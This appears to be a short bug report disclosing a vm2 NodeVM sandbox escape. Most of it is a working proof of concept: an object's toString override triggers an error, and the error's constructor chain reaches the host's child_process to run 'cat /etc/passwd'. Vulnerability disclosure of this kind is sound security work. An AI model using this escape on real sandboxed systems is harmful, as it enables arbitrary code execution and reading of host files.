NodeVM Breakout #285
Description
Hey,
I want to report the following breakout:
const {NodeVM} = require('vm2');
nvm = new NodeVM();
nvm.run(`
try {
a = {};
a.toString = function() {
return {};
}
process.listeners(a);
} catch(e) {
console.log(
e.constructor.constructor(
"return this.process.mainModule.require('child_process').execSync('cat /etc/passwd')")().toString()
);
}
`);